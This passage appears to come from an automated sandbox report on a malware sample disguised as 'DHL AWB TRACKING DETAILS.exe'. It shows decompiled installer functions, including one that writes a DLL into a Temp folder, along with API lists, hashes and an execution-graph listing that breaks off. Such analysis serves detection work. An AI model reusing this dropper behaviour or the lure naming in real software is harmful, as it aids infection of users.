                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: CharPrevlstrcatlstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\
                    • API String ID: 2659869361-3936084776
                    • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                    • Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
                    • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                    • Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401EC5 Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                    0x00401ec7
                    0x00401ecf
                    0x00401ed4
                    0x00401ed9
                    0x00401edd
                    0x00401ee0
                    0x00401ee2
                    0x00401ee9
                    0x00401ef2
                    0x00401efa
                    0x00401efd
                    0x00401f12
                    0x00401f18
                    0x00401f2b
                    0x00401f34
                    0x00401f40
                    0x00401f45
                    0x00401f45
                    0x00401f2b
                    0x00401f48
                    0x00401b75
                    0x00401b75
                    0x00401efd
                    0x00402880
                    0x0040288c

                    APIs
                    • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                    • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                    • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                      • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                    • String ID:
                    • API String ID: 1404258612-0
                    • Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                    • Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
                    • Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
                    • Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401D1B Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                    Download Yara Rule
                    C-Code - Quality: 67%
                    			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af7c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af83 = 1;
				 *0x40af80 = _t11 & 0x00000001;
				 *0x40af81 = _t11 & 0x00000002;
				 *0x40af82 = _t11 & 0x00000004;
				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af6c);
				_push(_t14);
				_push(_t26);
				E004059E3();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                    0x00401d29
                    0x00401d42
                    0x00401d4c
                    0x00401d51
                    0x00401d5c
                    0x00401d63
                    0x00401d75
                    0x00401d7b
                    0x00401d80
                    0x00401d8a
                    0x004024aa
                    0x00401561
                    0x00402825
                    0x00402880
                    0x0040288c

                    APIs
                    • GetDC.USER32(?), ref: 00401D22
                    • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                    • CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: CapsCreateDeviceFontIndirect
                    • String ID:
                    • API String ID: 3272661963-0
                    • Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                    • Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
                    • Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                    • Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404D73 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420480 != _t22) {
							 *0x420480 = _t22;
							E00405A85(0x420498, 0x424000);
							E004059E3(0x424000, _t22);
							E0040140B(6);
							E00405A85(0x424000, 0x420498);
						}
						L11:
						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004046F2(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403E83(0x413);
				return 0;
			}




                    0x00404d7f
                    0x00404da4
                    0x00404dc4
                    0x00404dc7
                    0x00404dca
                    0x00404de1
                    0x00404de7
                    0x00404dee
                    0x00404df5
                    0x00404dfc
                    0x00404e01
                    0x00404e07
                    0x00000000
                    0x00404e17
                    0x00404db1
                    0x00404e04
                    0x00404e04
                    0x00000000
                    0x00404e04
                    0x00404dbd
                    0x00404dbf
                    0x00000000
                    0x00404dbf
                    0x00404d85
                    0x00000000
                    0x00000000
                    0x00404d8c
                    0x00000000

                    APIs
                    • IsWindowVisible.USER32(?), ref: 00404DA9
                    • CallWindowProcA.USER32 ref: 00404E17
                      • Part of subcall function 00403E83: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403E95
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Window$CallMessageProcSendVisible
                    • String ID:
                    • API String ID: 3748168415-3916222277
                    • Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                    • Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
                    • Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                    • Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004024B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029E8(0x11));
				} else {
					E004029CB(1);
					 *0x409f68 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\engineer\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                    0x004024b0
                    0x004024b0
                    0x004024b3
                    0x004024ce
                    0x004024b5
                    0x004024b7
                    0x004024bc
                    0x004024c3
                    0x004024d5
                    0x0040264e
                    0x0040264e
                    0x004024db
                    0x004024ed
                    0x004015a6
                    0x004015a8
                    0x00000000
                    0x004015ae
                    0x004015a8
                    0x00402880
                    0x0040288c

                    APIs
                    • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                    • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                    Strings
                    • C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll, xrefs: 004024BC, 004024E1
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: FileWritelstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dll
                    • API String ID: 427699356-2009072728
                    • Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                    • Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
                    • Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                    • Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004055BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004055BF(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                    0x004055c0
                    0x004055ca
                    0x004055cc
                    0x004055d3
                    0x004055db
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004055db
                    0x004055dd
                    0x004055e2

                    APIs
                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe,C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe,80000000,00000003), ref: 004055C5
                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe,C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe,80000000,00000003), ref: 004055D3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: CharPrevlstrlen
                    • String ID: C:\Users\user\Desktop
                    • API String ID: 2709904686-3125694417
                    • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                    • Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
                    • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                    • Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004056D1 Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004056D1(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                    0x004056dd
                    0x004056df
                    0x00405707
                    0x004056ec
                    0x004056f1
                    0x004056fc
                    0x00000000
                    0x00405719
                    0x00405705
                    0x00405705
                    0x00000000

                    APIs
                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                    • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
                    • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: lstrlen$CharNextlstrcmpi
                    • String ID:
                    • API String ID: 190613189-0
                    • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                    • Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
                    • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                    • Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:4.1%
                    Dynamic/Decrypted Code Coverage:2.7%
                    Signature Coverage:5.8%
                    Total number of Nodes:549
                    Total number of Limit Nodes:64
                    execution_graph 32421 41f0f0 32422 41f0fb 32421->32422 32424 41b970 32421->32424 32425 41b996 32424->32425 32432 409d40 32425->32432 32427 41b9a2 32428 41b9c3 32427->32428 32440 40c1c0 32427->32440 32428->32422 32430 41b9b5 32476 41a6b0 32430->32476 32479 409c90 32432->32479 32434 409d4d 32435 409d54 32434->32435 32491 409c30 32434->32491 32435->32427 32441 40c1e5 32440->32441 32900 40b1c0 32441->32900 32443 40c23c 32904 40ae40 32443->32904 32445 40c4b3 32445->32430 32446 40c262 32446->32445 32913 4143a0 32446->32913 32448 40c2a7 32448->32445 32916 408a60 32448->32916 32450 40c2eb 32450->32445 32923 41a500 32450->32923 32454 40c341 32455 40c348 32454->32455 32935 41a010 32454->32935 32456 41bdc0 2 API calls 32455->32456 32458 40c355 32456->32458 32458->32430 32460 40c392 32461 41bdc0 2 API calls 32460->32461 32462 40c399 32461->32462 32462->32430 32463 40c3a2 32464 40f4a0 3 API calls 32463->32464 32465 40c416 32464->32465 32465->32455 32466 40c421 32465->32466 32467 41bdc0 2 API calls 32466->32467 32468 40c445 32467->32468 32940 41a060 32468->32940 32471 41a010 2 API calls 32472 40c480 32471->32472 32472->32445 32945 419e20 32472->32945 32475 41a6b0 2 API calls 32475->32445 32477 41a6cf ExitProcess 32476->32477 32478 41af60 LdrLoadDll 32476->32478 32478->32477 32480 409ca3 32479->32480 32530 418bc0 LdrLoadDll 32479->32530 32510 418a70 32480->32510 32483 409cb6 32483->32434 32484 409cac 32484->32483 32513 41b2b0 32484->32513 32486 409cf3 32486->32483 32524 409ab0 32486->32524 32488 409d13 32531 409620 LdrLoadDll 32488->32531 32490 409d25 32490->32434 32874 41b5a0 32491->32874 32494 41b5a0 LdrLoadDll 32495 409c5b 32494->32495 32496 41b5a0 LdrLoadDll 32495->32496 32497 409c71 32496->32497 32498 40f180 32497->32498 32499 40f199 32498->32499 32882 40b040 32499->32882 32501 40f1ac 32886 41a1e0 32501->32886 32504 409d65 32504->32427 32506 40f1d2 32507 40f1fd 32506->32507 32893 41a260 32506->32893 32509 41a490 2 API calls 32507->32509 32509->32504 32532 41a600 32510->32532 32514 41b2c9 32513->32514 32545 414a50 32514->32545 32516 41b2e1 32517 41b2ea 32516->32517 32584 41b0f0 32516->32584 32517->32486 32519 41b2fe 32519->32517 32602 419f00 32519->32602 32527 409aca 32524->32527 32852 407ea0 32524->32852 32526 409ad1 32526->32488 32527->32526 32865 408160 32527->32865 32530->32480 32531->32490 32535 41af60 32532->32535 32534 418a85 32534->32484 32536 41af70 32535->32536 32538 41af92 32535->32538 32539 414e50 32536->32539 32538->32534 32540 414e6a 32539->32540 32541 414e5e 32539->32541 32540->32538 32541->32540 32544 4152d0 LdrLoadDll 32541->32544 32543 414fbc 32543->32538 32544->32543 32546 414d85 32545->32546 32547 414a64 32545->32547 32546->32516 32547->32546 32610 419c50 32547->32610 32550 414b90 32613 41a360 32550->32613 32551 414b73 32670 41a460 LdrLoadDll 32551->32670 32554 414b7d 32554->32516 32555 414bb7 32556 41bdc0 2 API calls 32555->32556 32558 414bc3 32556->32558 32557 414d49 32560 41a490 2 API calls 32557->32560 32558->32554 32558->32557 32559 414d5f 32558->32559 32564 414c52 32558->32564 32679 414790 LdrLoadDll NtReadFile NtClose 32559->32679 32561 414d50 32560->32561 32561->32516 32563 414d72 32563->32516 32565 414cb9 32564->32565 32566 414c61 32564->32566 32565->32557 32567 414ccc 32565->32567 32568 414c66 32566->32568 32569 414c7a 32566->32569 32672 41a2e0 32567->32672 32671 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32568->32671 32573 414c97 32569->32573 32574 414c7f 32569->32574 32573->32561 32628 414410 32573->32628 32616 4146f0 32574->32616 32576 414c70 32576->32516 32578 414d2c 32676 41a490 32578->32676 32579 414c8d 32579->32516 32582 414caf 32582->32516 32583 414d38 32583->32516 32585 41b101 32584->32585 32586 41b113 32585->32586 32697 41bd40 32585->32697 32586->32519 32588 41b134 32700 414070 32588->32700 32590 41b180 32590->32519 32591 41b157 32591->32590 32592 414070 3 API calls 32591->32592 32594 41b179 32592->32594 32594->32590 32725 415390 32594->32725 32595 41b20a 32596 41b21a 32595->32596 32819 41af00 LdrLoadDll 32595->32819 32735 41ad70 32596->32735 32599 41b248 32814 419ec0 32599->32814 32603 41af60 LdrLoadDll 32602->32603 32604 419f1c 32603->32604 32846 a4967a 32604->32846 32605 419f37 32607 41bdc0 32605->32607 32849 41a670 32607->32849 32609 41b359 32609->32486 32611 41af60 LdrLoadDll 32610->32611 32612 414b44 32611->32612 32612->32550 32612->32551 32612->32554 32614 41a37c NtCreateFile 32613->32614 32615 41af60 LdrLoadDll 32613->32615 32614->32555 32615->32614 32617 41470c 32616->32617 32618 41a2e0 LdrLoadDll 32617->32618 32619 41472d 32618->32619 32620 414734 32619->32620 32621 414748 32619->32621 32622 41a490 2 API calls 32620->32622 32623 41a490 2 API calls 32621->32623 32624 41473d 32622->32624 32625 414751 32623->32625 32624->32579 32680 41bfd0 LdrLoadDll RtlAllocateHeap 32625->32680 32627 41475c 32627->32579 32629 41445b 32628->32629 32630 41448e 32628->32630 32631 41a2e0 LdrLoadDll 32629->32631 32632 4145d9 32630->32632 32636 4144aa 32630->32636 32633 414476 32631->32633 32634 41a2e0 LdrLoadDll 32632->32634 32635 41a490 2 API calls 32633->32635 32640 4145f4 32634->32640 32637 41447f 32635->32637 32638 41a2e0 LdrLoadDll 32636->32638 32637->32582 32639 4144c5 32638->32639 32642 4144e1 32639->32642 32643 4144cc 32639->32643 32693 41a320 LdrLoadDll 32640->32693 32646 4144e6 32642->32646 32647 4144fc 32642->32647 32645 41a490 2 API calls 32643->32645 32644 41462e 32649 41a490 2 API calls 32644->32649 32650 4144d5 32645->32650 32651 41a490 2 API calls 32646->32651 32648 414501 32647->32648 32681 41bf90 32647->32681 32653 414513 32648->32653 32684 41a410 32648->32684 32654 414639 32649->32654 32650->32582 32652 4144ef 32651->32652 32652->32582 32653->32582 32654->32582 32657 414567 32658 41457e 32657->32658 32692 41a2a0 LdrLoadDll 32657->32692 32659 414585 32658->32659 32660 41459a 32658->32660 32662 41a490 2 API calls 32659->32662 32663 41a490 2 API calls 32660->32663 32662->32653 32664 4145a3 32663->32664 32665 4145cf 32664->32665 32687 41bb90 32664->32687 32665->32582 32667 4145ba 32668 41bdc0 2 API calls 32667->32668 32669 4145c3 32668->32669 32669->32582 32670->32554 32671->32576 32673 41af60 LdrLoadDll 32672->32673 32674 414d14 32673->32674 32675 41a320 LdrLoadDll 32674->32675 32675->32578 32677 41af60 LdrLoadDll 32676->32677 32678 41a4ac NtClose 32677->32678 32678->32583 32679->32563 32680->32627 32683 41bfa8 32681->32683 32694 41a630 32681->32694 32683->32648 32685 41a42c NtReadFile 32684->32685 32686 41af60 LdrLoadDll 32684->32686 32685->32657 32686->32685 32688 41bbb4 32687->32688 32689 41bb9d 32687->32689 32688->32667 32689->32688 32690 41bf90 2 API calls 32689->32690 32691 41bbcb 32690->32691 32691->32667 32692->32658 32693->32644 32695 41af60 LdrLoadDll 32694->32695 32696 41a64c RtlAllocateHeap 32695->32696 32696->32683 32820 41a540 32697->32820 32699 41bd6d 32699->32588 32701 414081 32700->32701 32702 414089 32700->32702 32701->32591 32724 41435c 32702->32724 32823 41cf30 32702->32823 32704 4140dd 32705 41cf30 2 API calls 32704->32705 32708 4140e8 32705->32708 32706 414136 32709 41cf30 2 API calls 32706->32709 32708->32706 32828 41cfd0 32708->32828 32710 41414a 32709->32710 32711 41cf30 2 API calls 32710->32711 32713 4141bd 32711->32713 32712 41cf30 2 API calls 32721 414205 32712->32721 32713->32712 32715 414334 32835 41cf90 LdrLoadDll RtlFreeHeap 32715->32835 32717 41433e 32836 41cf90 LdrLoadDll RtlFreeHeap 32717->32836 32719 414348 32837 41cf90 LdrLoadDll RtlFreeHeap 32719->32837 32834 41cf90 LdrLoadDll RtlFreeHeap 32721->32834 32722 414352 32838 41cf90 LdrLoadDll RtlFreeHeap 32722->32838 32724->32591 32726 4153a1 32725->32726 32727 414a50 8 API calls 32726->32727 32729 4153b7 32727->32729 32728 41540a 32728->32595 32729->32728 32730 4153f2 32729->32730 32731 415405 32729->32731 32732 41bdc0 2 API calls 32730->32732 32733 41bdc0 2 API calls 32731->32733 32734 4153f7 32732->32734 32733->32728 32734->32595 32736 41ad84 32735->32736 32737 41ac30 LdrLoadDll 32735->32737 32839 41ac30 32736->32839 32737->32736 32739 41ad8d 32740 41ac30 LdrLoadDll 32739->32740 32741 41ad96 32740->32741 32742 41ac30 LdrLoadDll 32741->32742 32743 41ad9f 32742->32743 32744 41ac30 LdrLoadDll 32743->32744 32745 41ada8 32744->32745 32746 41ac30 LdrLoadDll 32745->32746 32747 41adb1 32746->32747 32748 41ac30 LdrLoadDll 32747->32748 32749 41adbd 32748->32749 32750 41ac30 LdrLoadDll 32749->32750 32751 41adc6 32750->32751 32752 41ac30 LdrLoadDll 32751->32752 32753 41adcf 32752->32753 32754 41ac30 LdrLoadDll 32753->32754 32755 41add8 32754->32755 32756 41ac30 LdrLoadDll 32755->32756 32757 41ade1 32756->32757 32758 41ac30 LdrLoadDll 32757->32758 32759 41adea 32758->32759 32760 41ac30 LdrLoadDll 